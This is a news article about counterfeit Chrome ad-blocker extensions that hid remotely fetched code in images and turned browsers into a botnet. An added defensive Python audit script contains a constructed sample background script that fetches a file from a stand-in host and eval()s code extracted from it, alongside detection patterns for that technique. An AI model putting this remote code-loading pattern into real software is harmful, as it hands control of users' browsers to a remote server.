It is hard to believe that an ad blocker could turn out to be malware, but it is apparently true. Andrey Meshkov, the co-founder of the ad blocker AdGuard, recently got curious about the number of knock-off ad-blocking extensions available for Google’s popular Chrome browser, according to Vice Motherboard.
Meshkov noticed the extensions were deliberately styled to look like legitimate ad blockers, but he wondered why they existed in the first place. So he downloaded one to take a closer look.
“Basically I downloaded it and checked what requests the extension was making,” Meshkov told Motherboard over the phone. “Some strange requests caught my attention.”
Meshkov noticed almost immediately that the ad blocker downloaded from the Chrome store contained code hidden inside an image that had been loaded from a remote command server. He says this gives the creator the ability to change the extension’s behaviour without shipping an update.
“Basically, this is a botnet composed of browsers infected with the fake Adblock extensions,” AdGuard wrote in its report, according to Engadget. “The browser will do whatever the command center server owner orders it to do.”
This behaviour is against Google’s policies, and after Meshkov wrote about his discovery, which included several examples with millions of users, Google removed the fake extensions from its Chrome store.
This is the full list, according to Meshkov.
AdRemover for Google Chrome™ (10M+ users)
uBlock Plus (8M+ users)
Adblock Pro (2M+ users)
HD for YouTube™ (400K+ users)
Webutation (30K+ users)
Meshkov says the fake extensions can be used for a number of dangerous actions beyond collecting personal information and browsing habits. These extensions can alter the appearance of pages, scrape information from the user, or load additional extensions that the user never installed. All in all, not good.
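The two warning signs described above, an extension that pulls an opaque resource from a remote server and executes what it finds inside, and a permission set broad enough to rewrite pages and read traffic, can be checked for with a static audit of an unpacked extension. The following is an added example written for this article, not code from AdGuard, Motherboard or any of the extensions named; the sample extension files, the host `example.invalid` and the permission and pattern lists are constructed for illustration.

```python
import json
import re
from typing import Dict, List

# Constructed sample of an unpacked extension (file name -> contents).
# Illustrative only; not taken from any real extension.
SAMPLE_EXTENSION: Dict[str, str] = {
    "manifest.json": json.dumps({
        "name": "Example Blocker",
        "version": "1.0",
        "manifest_version": 2,
        "permissions": ["<all_urls>", "webRequest", "webRequestBlocking", "tabs"],
        "background": {"scripts": ["bg.js"]},
    }),
    "bg.js": (
        "// constructed: fetches an 'image' from a remote host and runs text found inside it\n"
        "fetch('https://example.invalid/banner.png').then(r => r.text()).then(t => {\n"
        "  var code = t.split('/*s*/')[1];\n"
        "  eval(code);\n"
        "});\n"
    ),
}

# Constructed benign extension for comparison: narrow permission, no dynamic code.
BENIGN_EXTENSION: Dict[str, str] = {
    "manifest.json": json.dumps({"name": "Quiet", "version": "1.0",
                                 "manifest_version": 2, "permissions": ["storage"]}),
    "bg.js": "chrome.storage.local.set({ready: true});\n",
}

# Permissions that let an extension observe or rewrite all browser traffic and pages.
HIGH_RISK_PERMISSIONS = {"<all_urls>", "webRequest", "webRequestBlocking", "tabs", "cookies"}

# Patterns indicating code is assembled or executed at run time rather than shipped in the package.
DYNAMIC_CODE_PATTERNS = [
    (re.compile(r"\beval\s*\("), "eval()"),
    (re.compile(r"\bnew\s+Function\s*\("), "new Function()"),
    (re.compile(r"executeScript\s*\(\s*\{[^}]*\bcode\s*:"), "tabs.executeScript with a code string"),
]

# A network call whose target is an absolute http(s) URL on the same line.
REMOTE_FETCH_PATTERN = re.compile(r"\b(?:fetch|XMLHttpRequest)\b[^\n]*https?://")


def audit_extension(files: Dict[str, str]) -> List[str]:
    """Return human-readable findings for an unpacked extension given as name -> contents."""
    findings: List[str] = []

    manifest = json.loads(files.get("manifest.json", "{}"))
    risky = sorted(set(manifest.get("permissions", [])) & HIGH_RISK_PERMISSIONS)
    if risky:
        findings.append(f"manifest: high-risk permissions {risky}")

    for name, body in files.items():
        if not name.endswith(".js"):
            continue
        dynamic = [label for pattern, label in DYNAMIC_CODE_PATTERNS if pattern.search(body)]
        remote = REMOTE_FETCH_PATTERN.search(body) is not None
        for label in dynamic:
            findings.append(f"{name}: dynamic code execution via {label}")
        if remote:
            findings.append(f"{name}: fetches resources from a remote host")
        # The combination is the signature of remotely controlled behaviour:
        # the package on the store stays unchanged while the server decides what runs.
        if dynamic and remote:
            findings.append(f"{name}: remote fetch combined with dynamic execution (remote code loading)")
    return findings


if __name__ == "__main__":
    for finding in audit_extension(SAMPLE_EXTENSION):
        print(finding)
```

The audit is deliberately heuristic: obfuscated scripts can hide `eval` behind indirection, so a clean result is not proof of safety, while a hit on the remote-fetch-plus-dynamic-execution combination is a strong reason to inspect the extension’s network traffic by hand, which is exactly what surfaced the problem in the story above.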
Yan Zhu, a software engineer who works for the privacy-conscious browser Brave, told Motherboard Google has a history of approving sketchy extensions to its store.
“For instance, the extension could probably man-in-the-middle all the requests coming from your browser, but it can’t, for instance, read your browser’s encrypted password database, because that is not a privilege that extensions can have,” Zhu explained over a Twitter direct message.